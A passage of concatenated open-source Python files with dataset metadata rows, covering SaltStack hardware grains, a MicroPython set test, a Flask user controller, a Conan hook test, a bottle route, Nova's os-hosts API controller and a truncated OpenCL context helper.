                   ``cpuarch`` are consulted here.
    :returns: dict of hardware grains (may be empty)
    '''
    if salt.utils.is_proxy():
        return {}

    grains = {}
    # On SmartOS (possibly SunOS also) smbios only works in the global zone
    # smbios is also not compatible with linux's smbios (smbios -s = print summarized)
    if salt.utils.which_bin(['dmidecode', 'smbios']) is not None and not (
            salt.utils.is_smartos() or
            (  # SunOS on SPARC - 'smbios: failed to load SMBIOS: System does not export an SMBIOS table'
                osdata['kernel'] == 'SunOS' and
                osdata['cpuarch'].startswith('sparc')
            )):
        grains = {
            'biosversion': __salt__['smbios.get']('bios-version'),
            'productname': __salt__['smbios.get']('system-product-name'),
            'manufacturer': __salt__['smbios.get']('system-manufacturer'),
            'biosreleasedate': __salt__['smbios.get']('bios-release-date'),
            'uuid': __salt__['smbios.get']('system-uuid')
        }
        # Drop any field smbios could not provide.
        grains = dict([(key, val) for key, val in grains.items()
                       if val is not None])
        # Normalize the UUID to lower case.  The original code re-queried
        # smbios for 'system-uuid' here; reuse the value fetched above
        # instead of issuing a second identical call.
        uuid = grains.get('uuid')
        if uuid is not None:
            grains['uuid'] = uuid.lower()
        # First serial-number source that answers wins.
        for serial in ('system-serial-number', 'chassis-serial-number',
                       'baseboard-serial-number'):
            serial = __salt__['smbios.get'](serial)
            if serial is not None:
                grains['serialnumber'] = serial
                break
    elif osdata['kernel'] == 'FreeBSD':
        # On FreeBSD /bin/kenv (already in base system)
        # can be used instead of dmidecode
        kenv = salt.utils.which('kenv')
        if kenv:
            # In theory, it will be easier to add new fields to this later
            fbsd_hwdata = {
                'biosversion': 'smbios.bios.version',
                'manufacturer': 'smbios.system.maker',
                'serialnumber': 'smbios.system.serial',
                'productname': 'smbios.system.product',
                'biosreleasedate': 'smbios.bios.reldate',
                'uuid': 'smbios.system.uuid',
            }
            for key, val in six.iteritems(fbsd_hwdata):
                value = __salt__['cmd.run']('{0} {1}'.format(kenv, val))
                grains[key] = _clean_value(key, value)
    elif osdata['kernel'] == 'OpenBSD':
        sysctl = salt.utils.which('sysctl')
        hwdata = {'biosversion': 'hw.version',
                  'manufacturer': 'hw.vendor',
                  'productname': 'hw.product',
                  'serialnumber': 'hw.serialno',
                  'uuid': 'hw.uuid'}
        for key, oid in six.iteritems(hwdata):
            value = __salt__['cmd.run']('{0} -n {1}'.format(sysctl, oid))
            if not value.endswith(' value is not available'):
                grains[key] = _clean_value(key, value)
    elif osdata['kernel'] == 'NetBSD':
        sysctl = salt.utils.which('sysctl')
        nbsd_hwdata = {
            'biosversion': 'machdep.dmi.board-version',
            'manufacturer': 'machdep.dmi.system-vendor',
            'serialnumber': 'machdep.dmi.system-serial',
            'productname': 'machdep.dmi.system-product',
            'biosreleasedate': 'machdep.dmi.bios-date',
            'uuid': 'machdep.dmi.system-uuid',
        }
        for key, oid in six.iteritems(nbsd_hwdata):
            result = __salt__['cmd.run_all']('{0} -n {1}'.format(sysctl, oid))
            if result['retcode'] == 0:
                grains[key] = _clean_value(key, result['stdout'])
    elif osdata['kernel'] == 'Darwin':
        grains['manufacturer'] = 'Apple Inc.'
        sysctl = salt.utils.which('sysctl')
        hwdata = {'productname': 'hw.model'}
        for key, oid in hwdata.items():
            value = __salt__['cmd.run']('{0} -b {1}'.format(sysctl, oid))
            if not value.endswith(' is invalid'):
                grains[key] = _clean_value(key, value)
    elif osdata['kernel'] == 'SunOS' and osdata['cpuarch'].startswith('sparc'):
        # Depending on the hardware model, commands can report different bits
        # of information.  With that said, consolidate the output from various
        # commands and attempt various lookups.
        data = ""
        for (cmd, args) in (('/usr/sbin/prtdiag', '-v'),
                            ('/usr/sbin/prtconf', '-vp'),
                            ('/usr/sbin/virtinfo', '-a')):
            if salt.utils.which(cmd):  # Also verifies that cmd is executable
                data += __salt__['cmd.run']('{0} {1}'.format(cmd, args))
                data += '\n'

        # NOTE: the original code defined sn/obp/fw/uuid regex lists twice;
        # the first definitions were immediately rebound and never used, so
        # that dead first set has been removed.  Only the patterns that
        # actually took effect are kept below.
        sn_regexes = [
            re.compile(r) for r in [
                r'(?im)Chassis\s+Serial\s+Number\n-+\n(\S+)',  # prtdiag
                r'(?i)Chassis\s+Serial#:\s*(\S+)',  # virtinfo
                r'(?i)chassis-sn:\s*(\S+)',  # prtconf
            ]
        ]

        obp_regexes = [
            re.compile(r) for r in [
                r'(?im)System\s+PROM\s+revisions.*\nVersion\n-+\nOBP\s+(\S+)\s+(\S+)',  # prtdiag
                r'(?im)version:\s*\'OBP\s+(\S+)\s+(\S+)',  # prtconf
            ]
        ]

        fw_regexes = [
            re.compile(r) for r in [
                r'(?i)Sun\s+System\s+Firmware\s+(\S+)\s+(\S+)',  # prtdiag
            ]
        ]

        uuid_regexes = [
            re.compile(r) for r in [
                r'(?i)Domain\s+UUID:\s+(\S+)',  # virtinfo
            ]
        ]

        manufacture_regexes = [
            re.compile(r) for r in [
                r'(?im)^\s*System\s+Configuration:\s*(.*)(?=sun)',  # prtdiag
            ]
        ]

        product_regexes = [
            re.compile(r) for r in [
                r'(?im)^\s*System\s+Configuration:\s*.*?sun\d\S+\s(.*)',  # prtdiag
                r'(?im)^\s*banner-name:\s*(.*)',  # prtconf
                r'(?im)^\s*product-name:\s*(.*)',  # prtconf
            ]
        ]

        for regex in sn_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                grains['serialnumber'] = res.group(1).strip().replace("'", "")
                break

        # No break here: a later match deliberately overrides an earlier one.
        for regex in obp_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                obp_rev, obp_date = res.groups()[0:2]  # Limit the number in case we found the data in multiple places
                grains['biosversion'] = obp_rev.strip().replace("'", "")
                grains['biosreleasedate'] = obp_date.strip().replace("'", "")

        for regex in fw_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                fw_rev, fw_date = res.groups()[0:2]
                grains['systemfirmware'] = fw_rev.strip().replace("'", "")
                grains['systemfirmwaredate'] = fw_date.strip().replace("'", "")
                break

        for regex in uuid_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                grains['uuid'] = res.group(1).strip().replace("'", "")
                break

        # NOTE(review): these grain names ('manufacture', 'product') differ
        # from the smbios branch ('manufacturer', 'productname'); kept as-is
        # since callers may rely on the existing names.
        for regex in manufacture_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                grains['manufacture'] = res.group(1).strip().replace("'", "")
                break

        for regex in product_regexes:
            res = regex.search(data)
            if res and len(res.groups()) >= 1:
                grains['product'] = res.group(1).strip().replace("'", "")
                break

    return grains
def _smartos_computenode_data():
    '''
    Return useful information from a SmartOS compute node
    '''
    # Provides:
    #   vms_total
    #   vms_running
    #   vms_stopped
    #   sdc_version
    #   vm_capable
    #   vm_hw_virt
    if salt.utils.is_proxy():
        return {}

    grains = {}

    # *_vms grains: count the lines of parseable vmadm output per state.
    vm_counts = (
        ('computenode_vms_total', 'vmadm list -p'),
        ('computenode_vms_running', 'vmadm list -p state=running'),
        ('computenode_vms_stopped', 'vmadm list -p state=stopped'),
    )
    for grain_name, command in vm_counts:
        grains[grain_name] = len(__salt__['cmd.run'](command).split("\n"))

    # sysinfo derived grains
    sysinfo = json.loads(__salt__['cmd.run']('sysinfo'))
    grains['computenode_sdc_version'] = sysinfo['SDC Version']
    grains['computenode_vm_capable'] = sysinfo['VM Capable']
    if sysinfo['VM Capable']:
        grains['computenode_vm_hw_virt'] = sysinfo['CPU Virtualization']

    # sysinfo derived smbios grains
    grains['manufacturer'] = sysinfo['Manufacturer']
    grains['productname'] = sysinfo['Product']
    grains['uuid'] = sysinfo['UUID']

    return grains
def _smartos_zone_data():
    '''
    Return useful information from a SmartOS zone
    '''
    # Provides:
    #   pkgsrcversion
    #   imageversion
    #   pkgsrcpath
    #   zonename
    #   zoneid
    #   hypervisor_uuid
    #   datacenter
    if salt.utils.is_proxy():
        return {}

    grains = {}

    # Each grain is extracted from its source file line by line; the last
    # matching line wins, and 'Unknown' is used when nothing matched (or
    # the file does not exist).
    file_sources = (
        ('pkgsrcversion', '/etc/pkgsrc_version',
         re.compile('^release:\\s(.+)')),
        ('imageversion', '/etc/product',
         re.compile('Image:\\s(.+)')),
        ('pkgsrcpath', '/opt/local/etc/pkg_install.conf',
         re.compile('PKG_PATH=(.+)')),
    )
    for grain_name, filename, pattern in file_sources:
        if os.path.isfile(filename):
            with salt.utils.fopen(filename, 'r') as fp_:
                for line in fp_:
                    match = pattern.match(line)
                    if match:
                        grains[grain_name] = match.group(1)
        if grain_name not in grains:
            grains[grain_name] = 'Unknown'

    grains['zonename'] = __salt__['cmd.run']('zonename')
    grains['zoneid'] = __salt__['cmd.run'](
        'zoneadm list -p | awk -F: \'{ print $1 }\'', python_shell=True)

    grains.update(_mdata())

    return grains
def _mdata():
    '''
    Provide grains from the SmartOS metadata
    '''
    grains = {}
    mdata_list = salt.utils.which('mdata-list')
    mdata_get = salt.utils.which('mdata-get')

    # parse sdc metadata; unanswered keys fall back to "Unknown"
    for grain_name, sdc_key in (('hypervisor_uuid', 'sdc:server_uuid'),
                                ('datacenter', 'sdc:datacenter_name')):
        value = __salt__['cmd.run']('{0} {1}'.format(mdata_get, sdc_key))
        if "FAILURE" in value or "No metadata" in value:
            value = "Unknown"
        grains[grain_name] = value

    # parse vmadm metadata
    for mdata_grain in __salt__['cmd.run'](mdata_list).splitlines():
        grain_data = __salt__['cmd.run']('{0} {1}'.format(mdata_get,
                                                          mdata_grain))

        if mdata_grain == 'roles':
            # roles are exposed as a list grain
            grains['roles'] = grain_data.split(',')
        elif not mdata_grain.startswith('sdc:'):
            # every other non-sdc key is collected under the 'mdata' grain,
            # with '-' and ':' normalized to '_'
            grains.setdefault('mdata', {})
            sanitized = mdata_grain.replace('-', '_').replace(':', '_')
            grains['mdata'][sanitized] = grain_data

    return grains
def _zpool_data(grains):
    '''
    Provide grains about zpools

    :param grains: grains collected so far (unused; kept for call-site
                   compatibility)
    :returns: ``{'zpool': {name: size, ...}}`` or ``{}``
    '''
    # quickly return if windows or proxy
    if salt.utils.is_windows() or 'proxyminion' in __opts__:
        return {}
    # quickly return if the zpool command is not available
    # (original comment said "zpool and zfs", but only zpool is checked)
    if not salt.utils.which('zpool'):
        return {}

    # collect zpool data: each line of parseable output is "<name>\t<size>"
    zpool_grains = {}
    for zpool in __salt__['cmd.run']('zpool list -H -o name,size').splitlines():
        zpool = zpool.split()
        zpool_grains[zpool[0]] = zpool[1]

    # return grain data only if at least one pool was found
    if not zpool_grains:
        return {}
    return {'zpool': zpool_grains}
def get_server_id():
    '''
    Provides an integer based on the FQDN of a machine.
    Useful as server-id in MySQL replication or anywhere else you'll need an ID
    like this.
    '''
    # Provides:
    #   server_id
    if salt.utils.is_proxy():
        return {}

    minion_id = __opts__.get('id', '')
    # Fold the hash into a non-negative 31-bit integer.
    return {'server_id': abs(hash(minion_id) % (2 ** 31))}
def get_master():
    '''
    Provides the minion with the name of its master.
    This is useful in states to target other services running on the master.
    '''
    # Provides:
    #   master
    master = __opts__.get('master', '')
    return {'master': master}
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
| 37.653992 | 118 | 0.533778 |
f2a372f307018a3377c73eec9ffb49a9d91f5b12 | 63 | py | Python | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | 1 | 2019-05-07T15:01:19.000Z | 2019-05-07T15:01:19.000Z | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | null | null | null | tests/basics/set_add.py | bygreencn/micropython | 3f759b71c63f5e01df18a6e204c50f78d1b6a20b | [
"MIT"
] | null | null | null | s = {1, 2, 3, 4}
print(s.add(5))
l = list(s)
l.sort()
print(l)
| 10.5 | 16 | 0.507937 |
3aa1eed2c29b7732383f5dafc5657f122aec68f8 | 1,196 | py | Python | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | null | null | null | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | null | null | null | boilerplate/app/controllers/user.py | davideasaf/effortless_rest_flask | ee96069614aa670837152db36616b847f1cb5f73 | [
"MIT"
] | 1 | 2021-06-30T19:53:57.000Z | 2021-06-30T19:53:57.000Z | "User Controller"
from flask import abort, jsonify, request
from flask_accepts import responds, accepts
from flask_praetorian import roles_required
from flask_restx import Namespace, Resource
from app import api, guard
from app.models import User
from app.schemas import UserSchema, UserLoginSchema
# Create a namespace and attach to main API
user_api = Namespace("User", description="User Resources")
#
# REST + Examples
#
# Attach routes to namespace
# With flask-accepts, you no longer have to manually dump on the return statement.
# You can define all the request and response expectations on the route itself.
@user_api.route("/")
@user_api.doc(security="jwt")
class UserResourceFlaskAccepts(Resource):
@responds(schema=UserSchema(many=True), api=api)
@roles_required("admin")
def get(self):
users = User.query.all()
return users
@user_api.route("/<int:user_id>")
@user_api.doc(security="jwt")
class UserIdResourceNamespace(Resource):
@roles_required("admin")
def get(self, user_id: int):
user = User.query.get(user_id)
if not user:
abort(404, "User was not found")
return jsonify(UserSchema().dump(user))
| 26 | 82 | 0.726589 |
8c9cbe4a8083edbe6b890fe0e8ff6307cacf0c18 | 1,644 | py | Python | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 24 | 2019-01-07T11:55:32.000Z | 2022-03-23T18:11:34.000Z | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 308 | 2018-11-20T19:11:16.000Z | 2022-03-30T05:35:31.000Z | tests/test_hooks/conan-center/test_global_cppstd.py | Minimonium/hooks | 92a4ade551dab17c497244f42dc51328cc7fee2e | [
"MIT"
] | 31 | 2018-12-11T16:41:37.000Z | 2021-12-03T15:44:44.000Z | import os
import textwrap
from conans import tools
from tests.utils.test_cases.conan_client import ConanClientTestCase
class TestGlobalCPPSTD(ConanClientTestCase):
    """Tests for the KB-H001 check: the deprecated global 'cppstd' setting."""

    # Minimal recipe declaring the deprecated global 'cppstd' setting.
    conanfile = textwrap.dedent("""\
        from conans import ConanFile

        class AConan(ConanFile):
            settings = "cppstd"
        """)

    def _get_environ(self, **kwargs):
        # Point CONAN_HOOKS at this repository's conan-center hook so the
        # export runs the linter under test.
        kwargs = super(TestGlobalCPPSTD, self)._get_environ(**kwargs)
        kwargs.update({'CONAN_HOOKS': os.path.join(os.path.dirname(__file__), '..', '..', '..',
                                                   'hooks', 'conan-center')})
        return kwargs

    def test_forbidden_usage(self):
        # A bare global 'cppstd' setting must raise the KB-H001 error.
        tools.save('conanfile.py', content=self.conanfile)
        output = self.conan(['export', '.', 'name/version@user/channel'])
        self.assertIn("ERROR: [DEPRECATED GLOBAL CPPSTD (KB-H001)] The 'cppstd' setting is deprecated. "
                      "Use the 'compiler.cppstd' subsetting instead", output)

    def test_forbidden_usage_multi_settings(self):
        # The check must also fire when 'cppstd' appears among other settings.
        tools.save('conanfile.py', content=self.conanfile.replace('"cppstd"', '"cppstd", "os"'))
        output = self.conan(['export', '.', 'name/version@user/channel'])
        self.assertIn("ERROR: [DEPRECATED GLOBAL CPPSTD (KB-H001)] The 'cppstd' setting is deprecated. "
                      "Use the 'compiler.cppstd' subsetting instead", output)

    def test_ok_usage(self):
        # Using a different setting ('os') must not trigger the error.
        tools.save('conanfile.py', content=self.conanfile.replace("cppstd", "os"))
        output = self.conan(['export', '.', 'name/version@user/channel'])
        self.assertNotIn("ERROR: [GLOBAL CPPSTD DEPRECATED] ", output)
b08652b4a038535d44fa59b8b1eb9bcbda79081b | 502 | py | Python | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | web/dotfiles/http_lib.py | umi0451/dotfiles | c618811be788d995fe01f6a16b355828d7efdd36 | [
"MIT"
] | null | null | null | import bottle
from pathlib import Path
from clckwrkbdgr import xdg
ROOTDIR = Path(__file__).parent
@bottle.route('/lib/<javascript_module>.js')
def host_dotfiles_js_library(javascript_module):
    """Serve a JavaScript module from the user's config 'lib' directory."""
    bottle.response.content_type = 'application/javascript'
    module_file = xdg.save_config_path('lib') / '{0}.js'.format(javascript_module)
    return module_file.read_text()
@bottle.route('/lib/test/userscript')
@bottle.route('/lib/test/userscript_with_grant')
def test_userscripts():
    """Serve the static userscript test page for both test routes."""
    page = ROOTDIR / 'test_userscript.html'
    return page.read_text()
| 31.375 | 84 | 0.788845 |
8902b377abce9e95f359ec8084b381df4d0810ad | 14,182 | py | Python | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | 1 | 2015-02-26T03:23:49.000Z | 2015-02-26T03:23:49.000Z | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | null | null | null | nova/api/openstack/compute/legacy_v2/contrib/hosts.py | patanric/nova-fairness | 559f121190f3d71f7e3067e688b50d3d6d16e383 | [
"Apache-2.0"
] | 2 | 2015-06-17T13:24:55.000Z | 2015-10-27T05:28:38.000Z | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
    """The Hosts API controller for the OpenStack API."""

    def __init__(self):
        # Compute-layer facade used for all host queries and actions.
        self.api = compute.HostAPI()
        super(HostController, self).__init__()

    def index(self, req):
        """Returns a dict in the format:

        |   {'hosts': [{'host_name': 'some.host.name',
        |      'service': 'cells',
        |      'zone': 'internal'},
        |     {'host_name': 'some.other.host.name',
        |      'service': 'cells',
        |      'zone': 'internal'},
        |     {'host_name': 'some.celly.host.name',
        |      'service': 'cells',
        |      'zone': 'internal'},
        |     {'host_name': 'console1.host.com',
        |      'service': 'consoleauth',
        |      'zone': 'internal'},
        |     {'host_name': 'network1.host.com',
        |      'service': 'network',
        |      'zone': 'internal'},
        |     {'host_name': 'netwwork2.host.com',
        |      'service': 'network',
        |      'zone': 'internal'},
        |     {'host_name': 'compute1.host.com',
        |      'service': 'compute',
        |      'zone': 'nova'},
        |     {'host_name': 'compute2.host.com',
        |      'service': 'compute',
        |      'zone': 'nova'},
        |     {'host_name': 'sched1.host.com',
        |      'service': 'scheduler',
        |      'zone': 'internal'},
        |     {'host_name': 'sched2.host.com',
        |      'service': 'scheduler',
        |      'zone': 'internal'},
        |     {'host_name': 'vol1.host.com',
        |      'service': 'volume',
        |      'zone': 'internal'}]}
        """
        context = req.environ['nova.context']
        authorize(context)
        # NOTE(alex_xu): back-compatible with db layer hard-code admin
        # permission checks
        nova_context.require_admin_context(context)
        # Only enabled services are listed; an optional ?zone= filter
        # restricts the results to one availability zone.
        filters = {'disabled': False}
        zone = req.GET.get('zone', None)
        if zone:
            filters['availability_zone'] = zone
        services = self.api.service_get_all(context, filters=filters,
                                            set_zones=True)
        hosts = []
        # API-only services do not represent schedulable hosts, so they are
        # excluded from the listing.
        api_services = ('nova-osapi_compute', 'nova-ec2', 'nova-metadata')
        for service in services:
            if service.binary not in api_services:
                hosts.append({'host_name': service['host'],
                              'service': service['topic'],
                              'zone': service['availability_zone']})
        return {'hosts': hosts}

    def update(self, req, id, body):
        """Updates a specified body.

        :param body: example format {'status': 'enable',
                                     'maintenance_mode': 'enable'}
        """
        def read_enabled(orig_val, msg):
            """Checks a specified orig_val and returns True for 'enabled'
            and False for 'disabled'.

            :param orig_val: A string with either 'enable' or 'disable'. May
                             be surrounded by whitespace, and case doesn't
                             matter
            :param msg: The message to be passed to HTTPBadRequest. A single
                        %s will be replaced with orig_val.
            """
            val = orig_val.strip().lower()
            if val == "enable":
                return True
            elif val == "disable":
                return False
            else:
                raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
        context = req.environ['nova.context']
        authorize(context)
        # NOTE(alex_xu): back-compatible with db layer hard-code admin
        # permission checks. This has to be left only for API v2.0 because
        # this version has to be stable even if it means that only admins
        # can call this method while the policy could be changed.
        nova_context.require_admin_context(context)

        # See what the user wants to 'update'
        params = {k.strip().lower(): v for k, v in six.iteritems(body)}
        orig_status = status = params.pop('status', None)
        orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
        # Validate the request
        if len(params) > 0:
            # Some extra param was passed. Fail.
            explanation = _("Invalid update setting: '%s'") % list(
                params.keys())[0]
            raise webob.exc.HTTPBadRequest(explanation=explanation)
        if orig_status is not None:
            status = read_enabled(orig_status, _("Invalid status: '%s'"))
        if orig_maint_mode is not None:
            maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
        if status is None and maint_mode is None:
            explanation = _("'status' or 'maintenance_mode' needed for "
                            "host update")
            raise webob.exc.HTTPBadRequest(explanation=explanation)
        # Make the calls and merge the results
        result = {'host': id}
        if status is not None:
            result['status'] = self._set_enabled_status(context, id, status)
        if maint_mode is not None:
            result['maintenance_mode'] = self._set_host_maintenance(context,
                                                                    id,
                                                                    maint_mode)
        return result

    def _set_host_maintenance(self, context, host_name, mode=True):
        """Start/Stop host maintenance window. On start, it triggers
        guest VMs evacuation.
        """
        LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
                     "%(mode)s."),
                 {'host_name': host_name, 'mode': mode})
        try:
            result = self.api.set_host_maintenance(context, host_name, mode)
        except NotImplementedError:
            msg = _("Virt driver does not implement host maintenance mode.")
            raise webob.exc.HTTPNotImplemented(explanation=msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.ComputeServiceUnavailable as e:
            raise webob.exc.HTTPBadRequest(explanation=e.format_message())
        # Drivers are expected to report one of these two states; anything
        # else is treated as a bad request.
        if result not in ("on_maintenance", "off_maintenance"):
            raise webob.exc.HTTPBadRequest(explanation=result)
        return result

    def _set_enabled_status(self, context, host_name, enabled):
        """Sets the specified host's ability to accept new instances.

        :param enabled: a boolean - if False no new VMs will be able to start
                        on the host
        """
        if enabled:
            LOG.info(_LI("Enabling host %s."), host_name)
        else:
            LOG.info(_LI("Disabling host %s."), host_name)
        try:
            result = self.api.set_host_enabled(context, host_name=host_name,
                                               enabled=enabled)
        except NotImplementedError:
            msg = _("Virt driver does not implement host disabled status.")
            raise webob.exc.HTTPNotImplemented(explanation=msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.ComputeServiceUnavailable as e:
            raise webob.exc.HTTPBadRequest(explanation=e.format_message())
        # Drivers are expected to report one of these two states.
        if result not in ("enabled", "disabled"):
            raise webob.exc.HTTPBadRequest(explanation=result)
        return result

    def _host_power_action(self, req, host_name, action):
        """Reboots, shuts down or powers up the host."""
        context = req.environ['nova.context']
        authorize(context)
        # NOTE(alex_xu): back-compatible with db layer hard-code admin
        # permission checks. This has to be left only for API v2.0 because
        # this version has to be stable even if it means that only admins
        # can call this method while the policy could be changed.
        nova_context.require_admin_context(context)
        try:
            result = self.api.host_power_action(context, host_name=host_name,
                                                action=action)
        except NotImplementedError:
            msg = _("Virt driver does not implement host power management.")
            raise webob.exc.HTTPNotImplemented(explanation=msg)
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        except exception.ComputeServiceUnavailable as e:
            raise webob.exc.HTTPBadRequest(explanation=e.format_message())
        return {"host": host_name, "power_action": result}

    def startup(self, req, id):
        # Member action mapped via the extension's member_actions.
        return self._host_power_action(req, host_name=id, action="startup")

    def shutdown(self, req, id):
        # Member action mapped via the extension's member_actions.
        return self._host_power_action(req, host_name=id, action="shutdown")

    def reboot(self, req, id):
        # Member action mapped via the extension's member_actions.
        return self._host_power_action(req, host_name=id, action="reboot")

    @staticmethod
    def _get_total_resources(host_name, compute_node):
        # Total physical capacity of the compute node.
        return {'resource': {'host': host_name,
                             'project': '(total)',
                             'cpu': compute_node['vcpus'],
                             'memory_mb': compute_node['memory_mb'],
                             'disk_gb': compute_node['local_gb']}}

    @staticmethod
    def _get_used_now_resources(host_name, compute_node):
        # Usage as currently tracked by the resource tracker.
        return {'resource': {'host': host_name,
                             'project': '(used_now)',
                             'cpu': compute_node['vcpus_used'],
                             'memory_mb': compute_node['memory_mb_used'],
                             'disk_gb': compute_node['local_gb_used']}}

    @staticmethod
    def _get_resource_totals_from_instances(host_name, instances):
        # Usage summed from the instances' flavors (max theoretical usage).
        cpu_sum = 0
        mem_sum = 0
        hdd_sum = 0
        for instance in instances:
            cpu_sum += instance['vcpus']
            mem_sum += instance['memory_mb']
            hdd_sum += instance['root_gb'] + instance['ephemeral_gb']

        return {'resource': {'host': host_name,
                             'project': '(used_max)',
                             'cpu': cpu_sum,
                             'memory_mb': mem_sum,
                             'disk_gb': hdd_sum}}

    @staticmethod
    def _get_resources_by_project(host_name, instances):
        # Getting usage resource per project
        project_map = {}
        for instance in instances:
            resource = project_map.setdefault(instance['project_id'],
                                              {'host': host_name,
                                               'project': instance['project_id'],
                                               'cpu': 0,
                                               'memory_mb': 0,
                                               'disk_gb': 0})
            resource['cpu'] += instance['vcpus']
            resource['memory_mb'] += instance['memory_mb']
            resource['disk_gb'] += (instance['root_gb'] +
                                    instance['ephemeral_gb'])
        return project_map

    def show(self, req, id):
        """Shows the physical/usage resource given by hosts.

        :param id: hostname
        :returns: expected to use HostShowTemplate.
            ex.::

                {'host': {'resource':D},..}
                D: {'host': 'hostname','project': 'admin',
                    'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
        """
        context = req.environ['nova.context']

        # NOTE(eliqiao): back-compatible with db layer hard-code admin
        # permission checks. This has to be left only for API v2.0 because
        # this version has to be stable even if it means that only admins
        # can call this method while the policy could be changed.
        nova_context.require_admin_context(context)
        # NOTE(review): unlike the other actions, this method has no
        # extensions authorize() call and relies only on the admin-context
        # check above -- confirm that is intentional.
        host_name = id
        try:
            compute_node = (
                objects.ComputeNode.get_first_node_by_host_for_old_compat(
                    context, host_name))
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())
        instances = self.api.instance_get_all_by_host(context, host_name)
        resources = [self._get_total_resources(host_name, compute_node)]
        resources.append(self._get_used_now_resources(host_name,
                                                      compute_node))
        resources.append(self._get_resource_totals_from_instances(host_name,
                                                                  instances))
        by_proj_resources = self._get_resources_by_project(host_name,
                                                           instances)
        for resource in six.itervalues(by_proj_resources):
            resources.append({'resource': resource})
        return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
    """Admin-only host administration."""

    name = "Hosts"
    alias = "os-hosts"
    namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
    updated = "2011-06-29T00:00:00Z"

    def get_resources(self):
        """Register the os-hosts resource with its collection/member actions."""
        collection_actions = {'update': 'PUT'}
        member_actions = {"startup": "GET", "shutdown": "GET",
                          "reboot": "GET"}
        resource = extensions.ResourceExtension(
            'os-hosts', HostController(),
            collection_actions=collection_actions,
            member_actions=member_actions)
        return [resource]
| 42.208333 | 79 | 0.577563 |
14015077d508b7e219a8273c1bf7783b221f6ff3 | 1,485 | py | Python | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 10 | 2016-09-18T01:38:46.000Z | 2021-11-18T17:30:28.000Z | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 1 | 2018-06-20T05:48:19.000Z | 2018-06-20T09:19:56.000Z | src/triangulum/utils/cl.py | PolarNick239/Triangulum3D | 85c6a44f5c8f620bdc58164bd50ff89e1897f59d | [
"MIT"
] | 12 | 2015-11-29T03:22:37.000Z | 2020-07-14T03:08:52.000Z | #
# Copyright (c) 2015, Transas
# All rights reserved.
#
import logging
import pyopencl as cl
logger = logging.getLogger(__name__)
def create_context():
    """Create an OpenCL context on the first available device, preferring GPU over CPU."""
    platforms = cl.get_platforms()
    platform_labels = ['{}: {}.'.format(p.get_info(cl.platform_info.VENDOR),
                                        p.get_info(cl.platform_info.NAME))
                       for p in platforms]
    logger.debug('OpenCL platforms: {}'.format(platform_labels))

    chosen = None
    # GPUs are preferred; CPUs are only a fallback.  Every platform is still
    # visited so that all available devices get logged for debugging.
    for dev_type, type_name in [(cl.device_type.GPU, 'GPU'),
                                (cl.device_type.CPU, 'CPU')]:
        for platform in platforms:
            devices = platform.get_devices(dev_type)
            if not devices:
                continue
            platform_name = platform.get_info(cl.platform_info.NAME)
            device_names = [d.get_info(cl.device_info.NAME) for d in devices]
            logger.debug('OpenCL {} devices in {}: {}.'.format(
                type_name, platform_name, device_names))
            if chosen is None:
                chosen = devices[0]
                logger.info('OpenCL device to use: {} {}'.format(
                    platform_name, chosen.get_info(cl.device_info.NAME)))
